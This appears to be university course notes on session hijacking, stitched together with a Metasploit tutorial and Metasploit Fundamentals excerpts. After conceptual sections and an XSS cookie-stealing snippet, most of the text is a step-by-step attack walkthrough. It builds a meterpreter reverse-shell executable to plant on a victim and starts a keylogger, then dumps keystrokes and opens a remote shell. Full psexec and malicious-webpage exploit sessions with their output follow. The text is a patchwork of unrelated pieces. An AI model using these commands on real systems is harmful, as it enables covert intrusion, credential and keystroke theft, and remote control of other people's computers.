
SESSION HIJACKING - jntuhsd.in


Page 1: SESSION HIJACKING - jntuhsd.in

Page | 1

SESSION HIJACKING

Before looking at session hijacking, we first need to understand what a session is.

What is a Session?

A session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and a user.

Why are they needed?

Sessions are generally needed to ease authenticated communication between two or more parties. Because the session exists, the nodes are not required to authenticate for every activity or action.

Types of Session Hijacking:

Active Session Hijacking

Passive Session Hijacking

Active Session Hijacking:

Active session hijacking involves hijacking an already authenticated session. It means that the original user has logged in to his account or profile, and the attacker then steals the cookies to hijack the active session and disconnects the original user from the server.

WORKING:

In active session hijacking, attackers use client-side scripts to steal the original user's cookies, involving social engineering tactics such as emails and private messaging on forums and other social networking websites. It is called active session hijacking because attackers need to interact with the victim and need some actions to be performed by the victim to steal the session successfully, which can raise the level of suspicion.

Passive Session Hijacking:

In passive session hijacking, attackers do not hijack an active session; instead they capture the login credentials while the original user is trying to establish a new connection with the server, with the attacker sitting silently on the same network and recording the login credentials.

WORKING:

Passive session hijacking involves the use of network sniffing tools that capture data packets and exploit the weakness of the ARP protocol by poisoning the network. Attackers analyze the captured data to retrieve the user's login credentials.

It is called passive session hijacking because attackers do not need to interact with the user or make him perform any specific actions, so there is less risk of raising suspicion.

3 Way Handshake in action:

The user [192.168.0.105] initiates a connection with the server [66.220.153.11]: the user sends a packet to the server with the ‘SYN’ bit set.

The server receives this packet and sends back a packet with the SYN bit set and an ISN (Initial Sequence Number) for the server.

The user sets the ACK bit, acknowledging receipt of the packet, and increments the sequence number by 1.

The two machines have now successfully established a session.


TCP Session Hijacking:

TCP hijacking is the oldest type of session hijacking. TCP session hijacking deals with the successful prediction of the initial sequence numbers that get exchanged between two hosts, a client and a server. Sequence numbers are exchanged during the TCP three-way handshake:

Host A sends a packet with the SYN bit set to Host B to create a new connection.

Host B replies to Host A with a packet with the SYN/ACK bits set and an initial sequence number.

Host A replies to Host B with a packet with the ACK bit set and the initial sequence number + 1.

So, if attackers manage to predict the initial sequence number, they can send the last ACK packet to the server, spoofing the original host, and hijack the TCP connection.
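To make the prediction argument concrete, here is an added toy model of the handshake above (not code from this document) with two server-side ISN generators: a fixed-step counter that an observer can extrapolate, and an RFC 6528-style keyed-hash ISN that resists it. Addresses, ports and the key are constructed sample values, and the client ISN is fixed at 0 for simplicity.

```python
import hashlib
import hmac

MASK = 0xFFFFFFFF   # TCP sequence numbers are 32-bit


def weak_isn(four_tuple, state):
    """Predictable ISN: one global counter bumped by a fixed step per connection,
    the scheme early stacks used and the one the text assumes can be guessed."""
    state["last"] = (state["last"] + 64000) & MASK
    return state["last"]


def rfc6528_isn(four_tuple, state):
    """RFC 6528-style ISN: a clock value plus a keyed hash of the connection
    4-tuple. Without state["key"], an observer cannot compute the per-connection offset."""
    src, sport, dst, dport = four_tuple
    msg = f"{src}:{sport}-{dst}:{dport}".encode()
    offset = int.from_bytes(hmac.new(state["key"], msg, hashlib.sha256).digest()[:4], "big")
    return (state["clock"]() + offset) & MASK


def handshake(client, server, isn_fn, state):
    """Return the three segments as (flags, seq, ack): SYN, SYN/ACK, ACK.
    The server's ISN comes from isn_fn; the final ACK must carry ISN + 1."""
    four_tuple = (server[0], server[1], client[0], client[1])
    isn = isn_fn(four_tuple, state)
    syn = ("SYN", 0, None)                    # client ISN fixed at 0 in this model
    syn_ack = ("SYN/ACK", isn, 1)
    ack = ("ACK", 1, (isn + 1) & MASK)
    return [syn, syn_ack, ack]


def server_isn(segments):
    return segments[1][1]


def predict_next_isn(observed):
    """Extrapolate the next ISN from two observed ones, assuming a constant step."""
    step = (observed[-1] - observed[-2]) & MASK
    return (observed[-1] + step) & MASK


def prediction_succeeds(isn_fn, state):
    """Observe two handshakes, guess the server's third ISN, compare with the real one.
    True means an observer could forge the final ACK the text describes."""
    server = ("10.0.0.1", 80)                                   # constructed sample
    seen = [server_isn(handshake(("10.0.0.5", 40000 + i), server, isn_fn, state))
            for i in range(2)]
    guess = predict_next_isn(seen)
    real = server_isn(handshake(("10.0.0.5", 40002), server, isn_fn, state))
    return guess == real


if __name__ == "__main__":
    print("fixed-step ISN predictable:", prediction_succeeds(weak_isn, {"last": 0}))
    keyed = {"key": b"constructed-sample-key", "clock": lambda: 12345678}
    print("RFC 6528 ISN predictable:", prediction_succeeds(rfc6528_isn, keyed))
```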

Methods of TCP Session Hijacking:

Before predicting the initial sequence number of a TCP three-way handshake, attackers need to be between the client and the server to successfully hijack the TCP connection, for which an attacker can use these three techniques:

Source routing: an attacker can use source routing in such a way that the data being transferred between client and server passes through the attacker. In that case the attacker can see the data being exchanged, including the initial sequence number.

Man-in-the-middle attack: by logically placing himself between the server and the client, an attacker can similarly see the data connection going through him.

ICMP redirect: an attacker can also use ICMP redirects to pose as the gateway so that data is passed through him.

An attacker can also hijack a TCP session without predicting or looking for the initial sequence number: he lets the user establish a successful connection, then spoofs himself as the client by changing his MAC address to that of the original host, sends a packet with the RST bit set to the server to reset the connection, and starts a whole new connection from the TCP three-way handshake, exchanging new sequence numbers.


SESSION HIJACKING ATTACK

Description

The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed by a session token.

Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the web server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, such as in the URL, in the header of the HTTP request as a cookie, in other parts of the header of the HTTP request, or in the body of the HTTP request.

The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the web server.

The session token could be compromised in different ways; the most common are:

Predictable session token;

Session sniffing;

Client-side attacks (XSS, malicious JavaScript code, Trojans, etc.);

Man-in-the-middle attack;

Man-in-the-browser attack.


Examples

Example 1

Session Sniffing

In the example, first the attacker uses a sniffer to capture a valid session token called “Session ID”, then he uses the valid session token to gain unauthorized access to the web server.

Figure 2. Manipulating the token session executing the session hijacking attack.

Example 2

Cross-site script attack

The attacker can compromise the session token by using malicious code or programs running at the client side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link the JavaScript will run and carry out the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the cookie value of the current session; using the same technique it is possible to create specific JavaScript code that will send the cookie to the attacker.

<SCRIPT>alert(document.cookie);</SCRIPT>
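Both theft paths this section names, a sniffer on the wire and a script reading document.cookie, are blunted on the server side. The block below is an added example, not code from the OWASP text or any project: an in-memory session store with unguessable tokens, rotation after login, expiry, and a Set-Cookie value whose HttpOnly and Secure flags keep the token away from page scripts and cleartext HTTP. The class and function names are ours.

```python
import hmac
import secrets
import time

SESSION_TTL = 30 * 60   # seconds a token stays valid (illustrative value)


class SessionStore:
    """Server-side session table keyed by an unguessable token (ours, not a library API)."""

    def __init__(self, now=time.time):
        self._now = now                 # injectable clock so expiry can be tested
        self._sessions = {}             # token -> {"user": str, "expires": float}

    def create(self, user):
        """Issue a fresh token from the OS CSPRNG: 24 random bytes, URL-safe,
        so it cannot be predicted the way a counter or timestamp could."""
        token = secrets.token_urlsafe(24)
        self._sessions[token] = {"user": user, "expires": self._now() + SESSION_TTL}
        return token

    def validate(self, token):
        """Return the user behind a live token, else None. The comparison is
        constant-time so response timing does not leak matching prefixes."""
        for stored, rec in list(self._sessions.items()):
            if hmac.compare_digest(stored, token):
                if rec["expires"] > self._now():
                    return rec["user"]
                del self._sessions[stored]      # expired: drop it
                return None
        return None

    def rotate(self, old_token):
        """Swap the token after authentication (anti-fixation): a pre-login
        token an attacker planted or captured stops working."""
        user = self.validate(old_token)
        if user is None:
            return None
        del self._sessions[old_token]
        return self.create(user)


def session_cookie(token, name="SESSIONID"):
    """Set-Cookie value for the token. HttpOnly hides it from document.cookie
    (so the alert(document.cookie) payload above sees nothing), Secure keeps it
    off cleartext HTTP where a sniffer could read it, SameSite limits cross-site
    sends, and the token never travels in the URL."""
    return (f"{name}={token}; Path=/; Max-Age={SESSION_TTL}; "
            "HttpOnly; Secure; SameSite=Lax")


def script_readable(set_cookie_value):
    """True if a page script could read this cookie, i.e. HttpOnly is missing."""
    attrs = {part.strip().lower() for part in set_cookie_value.split(";")[1:]}
    return "httponly" not in attrs
```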


Figure 3. Code injection.



METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti-forensics, making forensic analysis of a compromised computer a little more difficult. They are released as part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness and power from a pentester’s POV. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.

I would recommend doing the following things in Metasploit on a Backtrack system or image, avoiding the Windows version of the tool.

For those who don't know, Backtrack is a Linux distro especially for security personnel, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or the VMware image, according to the one you're comfortable with. If you have physical access to more than one system, go for the ISO image and install it on your hard disk.

Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.

The default login credentials are:

Username: root

Pass: toor

Type in

root@bt:~# /etc/init.d/wicd start

to start the wicd manager.

Finally, type "startx" to start the GUI mode:

root@bt:~#startx


First of all, find your local IP by opening a konsole (bottom left of the taskbar) and typing in:

root@bt:~# ifconfig

It will be something like 192.168.x.x or 10.x.x.x. Make a note of it.

Now, launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now have a shell, something similar to a command prompt in Windows.


msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window) and type:

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” X > /root/reverse_tcp.exe

Your local IP is the one you noted earlier, and for the port you could select 4444. (Everything has to be entered without quotes.)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: LHOST=192.168.255.130,LPORT=4444

root@bt:/opt/metasploit3/msf3#

Also, you should now see a reverse_tcp.exe file on your Backtrack desktop.


Transfer it to your other computer in the same local network using a thumb drive or by uploading it online.

Now open the 1st shell window with msfconsole in it.

msf >

Type the following:

msf > use exploit/multi/handler


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130

LHOST => 192.168.255.130

msf exploit(handler) > set LPORT 4444

LPORT => 4444

All the settings are done. You have already made an executable file which makes a reverse connection to you, and now you have set the meterpreter handler to listen on port 4444.


The last step you have to do now is to type in “exploit” and press enter:

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444

[*] Starting the payload handler...

Now, the payload handler is listening for all incoming connections on port 4444.

[*] Sending stage (749056 bytes) to 192.168.255.1

[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You will see a meterpreter prompt like this:

meterpreter >

Type in ps to list the active processes

meterpreter > ps


Search for explorer.exe and migrate to that process (PID 5716 in this example):

meterpreter > migrate 5716

[*] Migrating to 5716...

[*] Migration completed successfully.

meterpreter >

Type in the following:

meterpreter > use priv

Now, if you want to start the keylogger on the victim, just type keyscan_start.


Now, if you want a shell on the victim’s computer, just type shell:

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

You will now have a command prompt. Type in whoami to see the victim’s computer name and user name:

C:\Windows\system32>whoami

whoami

win7-pc\win 7

C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.

Type in:

Let’s say the victim has typed something on his computer. Just type exit to return to meterpreter. Now type keyscan_dump to see all the captured keystrokes:

meterpreter > keyscan_dump


Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is for educational purposes only. You should test it only against computers you own.

About the Author: This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise includes online privacy issues, web application security and wireless hacking. You can connect with him on facebook here.

Working with Active and Passive Exploits in Metasploit

Metasploit Fundamentals

All exploits in the Metasploit Framework will fall into two categories: active and passive.

Active Exploits

Active exploits will exploit a specific host, run until completion, and then exit.

Brute-force modules will exit when a shell opens from the victim. Module execution stops if an error is encountered.


You can force an active module to the background by passing ‘-j’ to the exploit command:

msf exploit(ms08_067_netapi) > exploit -j

[*] Exploit running as background job.

msf exploit(ms08_067_netapi) >

Example

The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set RHOST 192.168.1.100

RHOST => 192.168.1.100

msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(psexec) > set LHOST 192.168.1.5

LHOST => 192.168.1.5

msf exploit(psexec) > set LPORT 4444

LPORT => 4444

msf exploit(psexec) > set SMBUSER victim

SMBUSER => victim

msf exploit(psexec) > set SMBPASS s3cr3t

SMBPASS => s3cr3t

msf exploit(psexec) > exploit

[*] Connecting to the server...

[*] Started reverse handler

[*] Authenticating as user 'victim'...

[*] Uploading payload...

[*] Created \hikmEeEM.exe...

[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...

[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...

[*] Obtaining a service manager handle...

[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...

[*] Closing service handle...

[*] Opening service...

[*] Starting the service...

[*] Removing the service...

[*] Closing service handle...

[*] Deleting \hikmEeEM.exe...

[*] Sending stage (240 bytes)

[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]


(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
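From the defender's side, the sequence visible in the output above (an executable with a random name written to the admin share, a service with random names created, started and removed) is a recognizable signature. The detection sketch below is an added example, not Metasploit's code or the original author's; the records are constructed, simplified stand-ins for the fields of Windows System log event 7045 (service installed), and the thresholds are illustrative.

```python
import math
import re
from collections import Counter

# Constructed records, not real log lines: the first mirrors the names seen in the
# psexec output above, the others are benign installs for comparison.
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "WS01", "service": "ciWyCVEp",
     "display": "MXAVZsCqfRtZwScLdexnD", "image": r"\\127.0.0.1\ADMIN$\hikmEeEM.exe",
     "start": "demand start", "account": "LocalSystem"},
    {"event_id": 7045, "host": "WS01", "service": "Spooler2",
     "display": "Print Spooler Helper", "image": r"C:\Windows\System32\spoolsv.exe",
     "start": "auto start", "account": "LocalSystem"},
    {"event_id": 7045, "host": "WS02", "service": "VmwareTools",
     "display": "VMware Tools", "image": r"C:\Program Files\VMware\vmtoolsd.exe",
     "start": "auto start", "account": "LocalSystem"},
]


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def case_change_ratio(name):
    """Fraction of adjacent letter pairs that switch case; generated names flip often."""
    changes = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return changes / (len(name) - 1)


def looks_random(name):
    """Letters only, no separators, frequent case flips and high per-character
    entropy: the shape of the names msfconsole generated above."""
    if not re.fullmatch(r"[A-Za-z]{8,24}", name):
        return False
    return case_change_ratio(name) >= 0.35 and shannon_entropy(name) >= 2.5


def psexec_like(event):
    """Return the reasons a 7045-style record resembles the psexec pattern."""
    reasons = []
    if looks_random(event["service"]):
        reasons.append("random service name")
    if looks_random(event["display"]):
        reasons.append("random display name")
    image = event["image"]
    if re.search(r"\\ADMIN\$\\", image, re.IGNORECASE):
        reasons.append("binary in ADMIN$ share")
    stem = re.sub(r"\.exe$", "", image.rsplit("\\", 1)[-1], flags=re.IGNORECASE)
    if looks_random(stem):
        reasons.append("random binary name")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Flag service installs that match at least min_reasons heuristics."""
    hits = []
    for e in events:
        if e["event_id"] != 7045:
            continue
        reasons = psexec_like(e)
        if len(reasons) >= min_reasons:
            hits.append((e["host"], e["service"], reasons))
    return hits
```

A production rule would also pair the install with the service removal and the file deletion that follow within seconds, which this sketch leaves out.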

Passive Exploits

Passive exploits wait for incoming hosts and exploit them as they connect.

Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.

They can also be used in conjunction with email exploits, waiting for connections. Passive exploits report shells as they happen; they can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell.

msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions

===============

Id Description Tunnel

-- ----------- ------

1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1

[*] Starting interaction with 1...

meterpreter >

Example

The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.

msf > use exploit/windows/browser/ani_loadimage_chunksize

msf exploit(ani_loadimage_chunksize) > set URIPATH /

URIPATH => /

msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5

LHOST => 192.168.1.5

msf exploit(ani_loadimage_chunksize) > set LPORT 4444

LPORT => 4444

msf exploit(ani_loadimage_chunksize) > exploit

[*] Exploit running as background job.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.5:8080/


[*] Server started.

msf exploit(ani_loadimage_chunksize) >

[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending HTML page to 192.168.1.100:1077...

[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...

[*] Sending stage (240 bytes)

[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2

[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>